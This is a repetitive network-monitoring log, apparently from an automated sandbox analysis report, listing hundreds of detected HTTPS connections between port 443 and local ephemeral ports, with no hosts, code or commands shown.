            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
            Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
            Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
            Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
